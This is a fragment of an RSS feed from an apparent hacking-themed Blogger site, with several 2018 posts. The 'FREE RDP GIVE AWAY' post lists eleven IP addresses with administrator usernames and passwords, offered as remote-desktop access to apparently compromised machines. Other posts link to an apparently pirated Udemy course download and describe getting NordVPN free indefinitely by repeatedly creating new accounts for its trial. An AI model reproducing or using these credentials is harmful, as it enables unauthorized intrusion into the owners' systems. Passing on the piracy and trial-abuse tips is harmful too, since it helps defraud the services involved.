&lt;a href=&quot;https://goo.gl/5HNR9o&quot;&gt;https://goo.gl/5HNR9o&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Share to help us 😘</description><link>https://kryptonhackingworld.blogspot.com/2018/05/requestedadvanced-course-of-drop.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcwHb_QzORJA4oHBXJXMxKaMBf9eSX1T7I-_AVh7ak35y_336uEObhWb9JprEFet5bBfl3gIufq23QmBP-pPWj_udmKEbOW2Uuuvv8OsQaZ3mKEO90RBOA2B3tx_zMLqiiZX39Ya2d4XRh/s72-c/download+%25283%2529.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-446590919508119642</guid><pubDate>Wed, 23 May 2018 14:01:00 +0000</pubDate><atom:updated>2018-05-24T04:41:12.492-07:00</atom:updated><title>FREE RDP GIVE AWAY</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCDZGomcgiquWJAI8dYS57L6gvuMm0QtUE2m2O3_BEgM9Wqu9Y774oXSEEMh9EHmTdiPHyFfDHu-br6tLAOxmx-7AJg0c6JlgxkxLnzVwyOMbev3Gv3CHiD7ZyQ9GBA56NVo3thnDXQu9n/s1600/download.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;205&quot; data-original-width=&quot;248&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCDZGomcgiquWJAI8dYS57L6gvuMm0QtUE2m2O3_BEgM9Wqu9Y774oXSEEMh9EHmTdiPHyFfDHu-br6tLAOxmx-7AJg0c6JlgxkxLnzVwyOMbev3Gv3CHiD7ZyQ9GBA56NVo3thnDXQu9n/s1600/download.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Free Rdp&#39;s&lt;br /&gt;
115.252.77.133@administrator;Server123&lt;br /&gt;
&lt;br /&gt;
117.218.153.219@administrator;admin@123&lt;br /&gt;
&lt;br /&gt;
117.218.25.80@admini&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;strator;pass@123&lt;br /&gt;
&lt;br /&gt;
117.247.65.180@administrator;password&lt;br /&gt;
&lt;br /&gt;
117.218.21.206@admin;12345&lt;br /&gt;
&lt;br /&gt;
117.218.163.216@administrator;admin@123&lt;br /&gt;
&lt;br /&gt;
116.199.168.88@admin;pass@123&lt;br /&gt;
&lt;br /&gt;
114.143.220.181@admin;admin@123&lt;br /&gt;
&lt;br /&gt;
117.247.65.51@administrator;admin@123&lt;br /&gt;
&lt;br /&gt;
117.247.83.142@administrator;admin@123&lt;br /&gt;
&lt;br /&gt;
117.218.166.252@admin;admin@123</description><link>https://kryptonhackingworld.blogspot.com/2018/05/free-rdp-give-away.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCDZGomcgiquWJAI8dYS57L6gvuMm0QtUE2m2O3_BEgM9Wqu9Y774oXSEEMh9EHmTdiPHyFfDHu-br6tLAOxmx-7AJg0c6JlgxkxLnzVwyOMbev3Gv3CHiD7ZyQ9GBA56NVo3thnDXQu9n/s72-c/download.png" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-2502649128497249020</guid><pubDate>Wed, 23 May 2018 11:20:00 +0000</pubDate><atom:updated>2018-05-24T04:43:12.250-07:00</atom:updated><title></title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho73KoR4tocLGAZz-YKcvPZ-rXAmZouYyy3h4iE8ZIxb7jiCyx9dMwgAKfDAG9EHixIH6EjqBmSZypfAOueQuu4Z4vkLh3-ilnuGIE2sxycV1oZe8mkwK1rz4OklXvRIiwcCGGg-bOWIqX/s1600/download+%25284%2529.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;168&quot; data-original-width=&quot;299&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho73KoR4tocLGAZz-YKcvPZ-rXAmZouYyy3h4iE8ZIxb7jiCyx9dMwgAKfDAG9EHixIH6EjqBmSZypfAOueQuu4Z4vkLh3-ilnuGIE2sxycV1oZe8mkwK1rz4OklXvRIiwcCGGg-bOWIqX/s1600/download+%25284%2529.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
​​&lt;br /&gt;
MACHINE LEARNING A-Z: HANDS-ON PYTHON &amp;amp; R IN DATA SCIENCE&lt;br /&gt;
&lt;br /&gt;
#Most_Requested_Course&lt;br /&gt;
&lt;br /&gt;
This course has been designed by two professional Data Scientists so that we can share our knowledge and help you learn complex theory, algorithms and coding libraries in a simple way.&lt;br /&gt;
&lt;br /&gt;
We will walk you step-by-step into the World &lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;of Machine Learning. With every tutorial you will develop new skills and improve your understanding of this challenging yet lucrative sub-field of Data Science.&lt;br /&gt;
&lt;br /&gt;
This course is fun and exciting, but at the same time we dive deep into Machine Learning. It is structured&lt;br /&gt;
&lt;br /&gt;
Share to help us 😘&lt;br /&gt;
&lt;br /&gt;
AND DONOT FORGET TO SUBSCRIBE US!!!!&lt;br /&gt;
&lt;br /&gt;
🖇Udemy link&lt;br /&gt;
&lt;a href=&quot;https://bit.ly/2lA5pgX&quot;&gt;https://bit.ly/2lA5pgX&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
🔗Download link&lt;br /&gt;
&lt;a href=&quot;https://bit.ly/2r3WWHA&quot;&gt;https://bit.ly/2r3WWHA&lt;/a&gt;</description><link>https://kryptonhackingworld.blogspot.com/2018/05/machine-learning-z-hands-on-python-r-in.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho73KoR4tocLGAZz-YKcvPZ-rXAmZouYyy3h4iE8ZIxb7jiCyx9dMwgAKfDAG9EHixIH6EjqBmSZypfAOueQuu4Z4vkLh3-ilnuGIE2sxycV1oZe8mkwK1rz4OklXvRIiwcCGGg-bOWIqX/s72-c/download+%25284%2529.jpg" height="72" width="72"/></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-425675784276321914.post-5736272265535032305</guid><pubDate>Wed, 23 May 2018 11:01:00 +0000</pubDate><atom:updated>2018-05-24T04:45:52.014-07:00</atom:updated><title>NordVPN FREE For Lifetime Method </title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnhAf89tHoKDMuZUnFul0uwsBVbfZiQ1gC7ciHLZMe0HDKqUJS_mSvXNJJCvUqRUmWsdZW3gjZLB2XzVzWu_L5UhJlqH_uuOIWXAV5ZbvyMSqcYL4pOlx5hTlwRArs0kGvnP1XV180qaE_/s1600/nordvpn-review.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;380&quot; data-original-width=&quot;728&quot; height=&quot;167&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnhAf89tHoKDMuZUnFul0uwsBVbfZiQ1gC7ciHLZMe0HDKqUJS_mSvXNJJCvUqRUmWsdZW3gjZLB2XzVzWu_L5UhJlqH_uuOIWXAV5ZbvyMSqcYL4pOlx5hTlwRArs0kGvnP1XV180qaE_/s320/nordvpn-review.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
NordVPN FREE For Lifetime Method&lt;br /&gt;
&lt;br /&gt;
We all need something for lifetime specially when its come to technology and internet related things. Today i am going to show you how to get a lifetime nordvpn for free&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
👉🏿Sign Up For Email Here https://app.tutanota.com/#register&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;👉🏿Now Once You Done That Get The Free Trial Here:&lt;br /&gt;
https://free.nordvpn.com/&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;👉🏿Confirm The Email, Set A Password And Done. Nord VPN Free&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;Rinse And Repeat Every 3 Days&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
</description><link>https://kryptonhackingworld.blogspot.com/2018/05/nordvpn-free-for-lifetime-method.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnhAf89tHoKDMuZUnFul0uwsBVbfZiQ1gC7ciHLZMe0HDKqUJS_mSvXNJJCvUqRUmWsdZW3gjZLB2XzVzWu_L5UhJlqH_uuOIWXAV5ZbvyMSqcYL4pOlx5hTlwRArs0kGvnP1XV180qaE_/s72-c/nordvpn-review.png" height="72" width="72"/></item></channel></rss>